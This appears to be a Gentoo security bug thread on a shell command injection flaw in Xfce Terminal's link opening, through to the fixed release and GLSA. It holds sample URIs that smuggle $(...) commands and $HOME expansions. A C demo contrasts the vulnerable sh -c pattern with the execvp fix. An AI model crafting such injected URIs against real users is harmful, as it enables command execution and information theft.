Clicking "Open Link" on a malicious link may leak information or allow remote shell command execution, because Xfce Terminal uses /bin/sh -c with gdk_spawn_on_screen for running the browser, with no proper escaping of the URI. A recommended fix would be to use the execvp(2) family of functions with no shell, but upstream does not want to fix this (I notified Benny of this issue in Nov 2006).

Example URIs:

  http://foo.bar/$(xterm)/                       - remote command execution
  http://google.com/search?q=$(ls)&sourceid=b0rk - used for stealing information
  http://google.com/search?q=$HOME               - examine environment

The behavior of these may vary depending on the browser chosen. I can verify the current results on two computers with the default setting "Mozilla Firefox" chosen, using xfce-extra/terminal-0.2.6-r1.
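The two spawn patterns contrasted in the report, as an added example that is not Terminal's own code: "echo" stands in for the configured browser and a plain fork/exec of /bin/sh stands in for gdk_spawn_on_screen, so the only difference between the two paths is whether the URI passes through a shell. The URIs are the constructed ones from the report (with "echo INJECTED" in place of xterm so the result is visible as output).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* fork + execvp argv[0], capture the child's stdout into buf.
   Returns the number of bytes captured, or -1 on failure. */
static ssize_t run_capture(char *const argv[], char *buf, size_t len)
{
    int fds[2];
    if (pipe(fds) == -1)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);
    }
    close(fds[1]);
    size_t total = 0;
    ssize_t n;
    while (total < len - 1 && (n = read(fds[0], buf + total, len - 1 - total)) > 0)
        total += (size_t)n;
    buf[total] = '\0';
    close(fds[0]);
    int status;
    waitpid(pid, &status, 0);
    return (ssize_t)total;
}

/* Vulnerable pattern from the report: browser and URI are concatenated into
   one command line and handed to /bin/sh -c, so $(...), $VAR, ;, | etc.
   in the URI are interpreted by the shell. (Assumption: "/bin/sh -c" via
   fork/exec stands in for gdk_spawn_on_screen with a shell command.) */
static ssize_t open_uri_via_shell(const char *browser, const char *uri,
                                  char *out, size_t len)
{
    char cmdline[512];
    snprintf(cmdline, sizeof cmdline, "%s %s", browser, uri);
    char *const argv[] = { "/bin/sh", "-c", cmdline, NULL };
    return run_capture(argv, out, len);
}

/* Hardened pattern: no shell at all. The URI is a single argv element and
   reaches the browser byte-for-byte, whatever characters it contains. */
static ssize_t open_uri_via_execvp(const char *browser, const char *uri,
                                   char *out, size_t len)
{
    char *const argv[] = { (char *)browser, (char *)uri, NULL };
    return run_capture(argv, out, len);
}

static const char *const URI_CMD = "http://foo.bar/$(echo INJECTED)/";
static const char *const URI_ENV = "http://google.com/search?q=$HOME";

/* 1 if the shell executed the $(...) inside the URI, 0 if not, -1 on error. */
int shell_path_executes_substitution(void)
{
    char out[256];
    if (open_uri_via_shell("echo", URI_CMD, out, sizeof out) < 0)
        return -1;
    return strstr(out, "INJECTED") != NULL && strstr(out, "$(") == NULL;
}

/* 1 if the shell expanded $HOME (the environment leak from the report). */
int shell_path_expands_env(void)
{
    char out[256];
    if (open_uri_via_shell("echo", URI_ENV, out, sizeof out) < 0)
        return -1;
    return strstr(out, "$HOME") == NULL;
}

/* 1 if the execvp path delivered the URI literally, $(...) and $HOME intact. */
int execvp_path_keeps_uri_literal(void)
{
    char out[256];
    if (open_uri_via_execvp("echo", URI_CMD, out, sizeof out) < 0)
        return -1;
    if (strstr(out, "$(echo INJECTED)") == NULL)
        return 0;
    if (open_uri_via_execvp("echo", URI_ENV, out, sizeof out) < 0)
        return -1;
    return strstr(out, "$HOME") != NULL;
}

int main(void)
{
    printf("sh -c executes $(...) in URI:   %d\n", shell_path_executes_substitution());
    printf("sh -c expands $HOME in URI:     %d\n", shell_path_expands_env());
    printf("execvp keeps URI literal:       %d\n", execvp_path_keeps_uri_literal());
    return 0;
}
```

The execvp path is the fix the report recommends: because no shell ever parses the string, there is nothing to escape, which is more robust than trying to quote the URI for /bin/sh.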
Could you link us to the upstream bug you have opened?
I have not, as I don't have an account on their Bugzilla. I reported it by email.
setting status. Xfce, please keep us informed when upstream releases a fix for this.
(In reply to comment #3)
> setting status. Xfce, please keep us informed when upstream releases a fix for
> this.

Fixed in upstream trunk. Expect a patch tomorrow.
*terminal-0.2.6_p25931 (21 Jul 2007)

  21 Jul 2007; Samuli Suominen <drac@gentoo.org> +terminal-0.2.6_p25931.ebuild:
  Snapshot to fix security bug 184886, remote shell command execution.
Thanks Samuli. Arches, please test and mark stable xfce-extra/terminal-0.2.6_p25931. Target keywords are: "alpha amd64 arm hppa ia64 mips ppc ppc64 sparc x86 ~x86-fbsd"
amd64 stable
Stable for HPPA.
On Alpha:
1. Compiles fine
2. Passes collision test
3. Works nice with no URL exploit

Terminal 0.2.7svn-25931 (Xfce 4.4.1)

Portage 2.1.2.9 (default-linux/alpha/2007.0/desktop, gcc-4.1.2, glibc-2.5-r4, 2.6.21-gentoo-r4 alpha)
=================================================================
System uname: 2.6.21-gentoo-r4 alpha EV56
Gentoo Base System release 1.12.9
Timestamp of tree: Sat, 21 Jul 2007 13:50:01 +0000
ccache version 2.4 [enabled]
dev-lang/python:     2.4.4-r4
dev-python/pycrypto: 2.0.1-r5
dev-util/ccache:     2.4-r7
sys-apps/sandbox:    1.2.18.1
sys-devel/autoconf:  2.13, 2.61
sys-devel/automake:  1.4_p6, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
sys-devel/binutils:  2.17.50.0.16
sys-devel/gcc-config: 1.3.16
sys-devel/libtool:   1.5.23b
virtual/os-headers:  2.6.17-r2
ACCEPT_KEYWORDS="alpha"
AUTOCLEAN="yes"
CBUILD="alpha-unknown-linux-gnu"
CFLAGS="-mieee -pipe -O2 -mcpu=ev5"
CHOST="alpha-unknown-linux-gnu"
CONFIG_PROTECT="/etc /usr/share/X11/xkb"
CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/terminfo"
CXXFLAGS="-mieee -pipe -O2 -mcpu=ev5"
DISTDIR="/usr/portage/distfiles"
FEATURES="ccache distlocks metadata-transfer parallel-fetch sandbox sfperms strict"
GENTOO_MIRRORS="http://distfiles.gentoo.org http://distro.ibiblio.org/pub/linux/distributions/gentoo"
LINGUAS="en"
MAKEOPTS="-j2"
PKGDIR="/usr/portage/packages"
PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --filter=H_**/files/digest-*"
PORTAGE_TMPDIR="/var/tmp"
PORTDIR="/usr/portage"
PORTDIR_OVERLAY="/usr/portage/local/layman/berkano"
SYNC="rsync://rsync.namerica.gentoo.org/gentoo-portage"
USE="X acl alpha alsa berkdb bitmap-fonts bzip2 cairo cdr cli cracklib crypt cups curl dbus dri dvd dvdr dvdread encode evo fam fortran gdbm gif gpm gtk hal iconv ipv6 isdnlog jpeg libg++ libnotify mad midi mikmod mp3 mpeg mudflap ncurses nls nptl nptlonly ogg opengl openmp oss pam pcre pdf perl png pppd python qt3 qt3support qt4 quicktime readline reflection sdl session spell spl ssl startup-notification svg tcpd tiff truetype truetype-fonts type1-fonts unicode vorbis xml xorg xv zlib" ALSA_CARDS="ali5451 als4000 bt87x ca0106 cmipci emu10k1 ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 maestro3 trident usb-audio via82xx ymfpci" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mulaw multi null plug rate route share shm softvol" ELIBC="glibc" INPUT_DEVICES="keyboard evdev mouse joystick" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="en" USERLAND="GNU" VIDEO_CARDS="radeon vga fbdev"
Unset:  CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS
alpha/ia64/x86 stable, thanks Brian
arm done
sparc stable.
ppc64 stable
ppc stable, ready for glsa
zzzz..
(In reply to comment #15)
> zzzz..

I don't know if this comment is for the security team, but just so you know, we've got about 130 open bugs which need some attention, plus 20 GLSAs in the pool waiting to be drafted/reviewed/sent. I'm doing as much as I can, but the security team is clearly understaffed to achieve all this work in a timely manner, so if you wanna join us and help out, you're welcome :)
mips stable.
It's GLSA 200708-07. Thanks everybody, and sorry for the delay.